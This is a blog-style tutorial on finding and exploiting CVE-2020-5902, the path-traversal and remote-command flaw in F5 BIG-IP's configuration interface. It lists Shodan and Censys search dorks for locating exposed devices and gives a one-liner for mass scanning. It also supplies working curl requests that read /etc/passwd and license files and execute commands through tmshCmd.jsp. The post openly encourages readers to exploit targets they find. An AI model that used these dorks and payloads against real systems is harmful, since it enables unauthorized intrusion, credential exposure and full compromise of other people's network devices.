Search

How to Find and Exploit CVE 2020-5902

Updated: 7 days ago

Introduction of CVE 2020-5902


CVE 2020-5902 is a critical vulnerability in the BIG-IP Traffic Management User Interface (TMUI) which is also known as the Configuration Utility. The severity of this vulnerability is critical as this received a CVSSv3 rating of 10.0, the highest possible score. Exploitation of this flaw would grant an attacker a variety of privileges, including the ability to execute arbitrary system commands, create or delete files, as well as disable services on the vulnerable host. The advisory states that the vulnerability could also “result in complete system compromise.”

In simple words, CVE 2020-5902 allows an unauthorized user to run commands and completely compromise the system including interception of controller application traffic.

The vulnerability can be exploited remotely and 8k+ vulnerable F5 Big IP devices are available on the internet which can be accessed easily.


How to find CVE 2020-5902 vulnerable servers?


The answer for this is very simple: "Just Dork it"

Shodan, Censys can give you best results


Using Shodan Dorks to find CVE 2020-5902 vulnerable servers.

http.title:"BIG-IP®- Redirect"
http.favicon.hash:-335242539
WWW-Authenticate: Basic realm=BIG-IP

You can download and explore all shodan search results with shodan CLI using below commands:

shodan download BIG-IP 'http.title:"BIG-IP®- Redirect"'
shodan parse --fields ip_str,port BIGip.json.gz

If you have shodan credits you can automate this whole process using below script and start exploitation instead of searching for vulnerable targets.

Shodan Script for Mass Exploitation

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui..." | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

Using Censys Dorks to find CVE 2020-5902 vulnerable servers.

443.https.get.title:"BIG-IP®- Redirect"
"BIG-IP®- Redirect"
<YOUR TARGET> "BIG-IP&reg;- Redirect"

Found vulnerable targets, now its time to exploit CVE 2020-5902


How to Exploit CVE 2020-5902 ?


To exploit CVE 2020-5902, an attacker needs to send a specially crafted HTTP request to the server hosting the TMUI utility for BIG-IP configuration. Let's do the same in simple steps.


Step 1- Search the IP of vulnerable target in URL and a login page will come up

Step 2- Refresh the page the capture the request in burp and replace the URL with

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

and you will get etc/passwd file in response

also try /config/bigip.license and /etc/hosts in fileName parameter


You can do the same in CLI with Curl using below command.

curl -v -k 'http://host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

this will give you result in CLI

Wait! Wait! Wait!


you can achieve RCE with CVE 2020-5902 using below command.

curl -v -k 'http://<TARGET IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami'

also try

 curl -v -k 'http://<TARGET IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

-----------------------------------------------THE END--------------------------------------------------

Command Source: Devcentral


Wanna thank me? You can buy me a coffee!

Connect with me:

Linkedin

Twitter

Instagram


2,777 views